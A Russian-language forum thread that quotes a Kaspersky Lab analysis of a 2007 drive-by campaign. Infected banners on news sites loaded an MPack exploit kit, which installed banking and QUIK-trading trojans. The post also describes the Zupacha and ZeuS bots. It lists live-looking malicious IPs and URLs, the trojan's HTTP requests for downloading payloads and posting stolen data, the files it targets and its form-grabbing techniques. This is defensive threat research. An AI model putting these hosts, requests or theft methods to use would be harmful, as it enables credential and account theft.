айкидока Опубликовано 6 декабря, 2007 Поделиться Опубликовано 6 декабря, 2007 Аналитики "Лаборатория Касперского" рассказывают о формирующейся тенденции: новые угрозы в последнее время представляют собой в основном массированный поток однообразных троянских программ, появление которых уже не вызывает такого резонанса в интернет-сообществе, как раньше... Источник: crime-research.ru http://www.crime-research.ru/news/06.12.2007/4048/ - про это здесь Ссылка на комментарий Поделиться на другие сайты More sharing options...
Vinni Опубликовано 6 декабря, 2007 Поделиться Опубликовано 6 декабря, 2007 Аналитики "Лаборатория Касперского" рассказывают о формирующейся тенденции: новые угрозы в последнее время представляют собой в основном массированный поток однообразных троянских программ, появление которых уже не вызывает такого резонанса в интернет-сообществе, как раньше... Источник: crime-research.ru http://www.crime-research.ru/news/06.12.2007/4048/ - про это здесь Я все-таки предпочитаю первоисточник (http://www.viruslist.com/ru/analysis?pubid=204007578). Тем более, что там почти детективная история. Днем 25 июля 2007 года (спустя всего десять дней после появления Gpcode.ai) экспертами «Лаборатории Касперского» было отмечено активное распространение новой вредоносной программы. Заражению подвергались компьютеры пользователей, которые посещали популярные российские информационные сайты utro.ru, gzt.ru, rbc.ru. В ходе расследования было установлено, что во всех случаях из баннерной системы utro.ru (http://www.txt.utro.ru/cgi-bin/banner/rian?86028&options=FN) шло соединение с вредоносным сайтом (http://81.95.145.210/333/m00333/index.php), размещенным на печально известном «bulletproof»-хостинге RBN (Russian Business Network). При открытии этой страницы браузер пользователя подвергался атаке при помощи набора эксплойтов (использовалась популярная для этих целей система MPack). Если атака была успешной, в систему загружался троянец-загрузчик. Он, в свою очередь, устанавливал основную вредоносную программу — Trojan- Spy.Win32.Bancos.aam. После установки в систему троянец начинал выполнять следующие команды: Host: 81.95.149.66 GET /e1/file.php HTTP/1.1 GET /ldr1.exe HTTP/1.1 GET /cfg.bin HTTP/1.0 POST /s.php?1=april_002fdf3f&i= HTTP/1.0 В результате этих действий в системе зараженного компьютера появлялся файл с уже знакомым вирусным аналитикам именем «ntos.exe»: такое же имя файла использовалось при инсталляции в систему Gpcode.ai. Ожидая худшего — нового «шифровальщика», — мы приступили к детальному анализу файла. Это оказался не Gpcode. Новый Bancos.aam стал первым зафиксированным троянцем-шпионом, ориентированным на кражу данных пользователей российской системы QUIK. QUIK — программный комплекс, который обеспечивает доступ к биржевым торговым системам в режиме онлайн. Совершение сделок с ценными бумагами через Интернет называется интернет-трейдингом. Состоит QUIK из серверной части и рабочих мест (терминалов) клиента, взаимодействующих между собой через Сеть. Ранее мы никогда не видели, чтобы вирусописатели столь явно стремились получить доступ к системам биржевой торговли. Аккаунты от банковских систем — да, давно и много. Но торги на бирже?.. Троянец искал в системе файлы с именами «secring.txk», «pubring.txk», «qrypto.cfg», в которых и хранится информация о параметрах доступа к QUIK, а затем пересылал эти файлы на собственный сервер. Зная, какие именно файлы ищет шпион, мы вновь обратились к имеющейся у нас коллекции вредоносных программ. Было найдено еще пять вариантов данного троянца, самый первый из которых был датирован началом июля. Впоследствии все они были выделены в новое семейство Trojan-PSW.Win32.Broker. ... Итак, с чем же мы имели дело все это время? На хакерских сайтах активно продавался набор Zunker+Zupacha — контрольный центр управления ботнетом и бот-клиент. Это мы уже знали. Интересным открытием стала сумма, которую хотели неизвестные авторы бот-системы за данную связку: вплоть до 3000 долларов США. Иногда попадались предложения купить «сладкую парочку» гораздо дешевле, долларов за 200. Существует целая пирамида по продаже троянских программ, на вершине которой стоит разработчик, а за ним целая сеть продавцов и перепродавцов — отсюда и такая огромная разница в цене. Впрочем, мы быстро получили все интересующие нас файлы от Zunker и Zupacha совершенно бесплатно, используя исключительно Google и зная адреса некоторых уже работающих ботнетов. Полный функционал Zupacha был довольно внушительным. Помимо загрузки других файлов в систему его основной задачей было дальнейшее самораспространение. Об одном из таких способов (встраивании своих текстов в сообщения на форумах) мы писали выше. Всего же Zupacha мог «спамить» свои ссылки тремя способами: * ICQ\Jabber-спам. Тексты со ссылкой на вредоносные сайты добавляются во все сообщения, которые пользователь отправляет из этих Instant Messengers. * Web-спам. Тексты добавляются в любые веб-формы, заполняемые пользователем. Как правило, это форумы, а также веб-интерфейсы почтовых систем. * Почтовый спам. Текст добавляется к тексту писем пользователя. Необходимо отметить, что во всех этих случаях Zupacha самостоятельно не инициирует рассылку сообщений всеми описанными методами. Он только контролирует активность пользователя и добавляет свои тексты в любые исходящие сообщения, причем сам пользователь этого не видит. Однако Zupacha не занимается кражей данных — это всего лишь самораспространяющийся троянец-загрузчик. Следовательно, он не мог выступить в роли пресловутого «универсального» кода. В результате дальнейшего анализа хакерских предложений вредоносных программ мы пришли к выводу, что «универсальным» кодом, использованным в сотнях вариантах Bancos.aam, Gpcode.ai и Broker, оказался бот ZeuS (авторское название). ... В функционал бота, помимо стандартных процедур инсталляции себя в систему, внедрения в запущенные процессы, борьбы с некоторыми антивирусами, предоставления услуг анонимного socks- и http прокси-сервера, входит и мощнейшая процедура кражи информации: * Троянец ворует содержимое Protected Storage, в котором содержатся пользовательские пароли. * Формграббер. Троянец перехватывает любые отправляемые через браузер данные, вводимые в формы. Контролируемые адреса, с которых перехватывается информация, — это, как правило, адреса банков и платежных систем. Таким образом происходит кража аккаунтов. * Обход виртуальных клавиатур. Троянец перехватывает нажатие кнопки мыши и делает скриншот экрана в этот момент. * Подмена сайтов и страничек. Это весьма интересный способ, ранее использовавшийся именно в Nuclear Grabber. При попытке пользователя выйти на один из сайтов, обращение к которым контролируется троянцем, происходит либо редирект запроса на поддельный фишинговый сайт, либо добавление в оригинальную страницу сайта нового поля для ввода данных. Содержимое страницы подменяется прямо на компьютере пользователя, еще до отображения в браузере! * Кража сертификатов. Ссылка на комментарий Поделиться на другие сайты More sharing options...
Рекомендуемые сообщения
Заархивировано
Эта тема находится в архиве и закрыта для дальнейших ответов.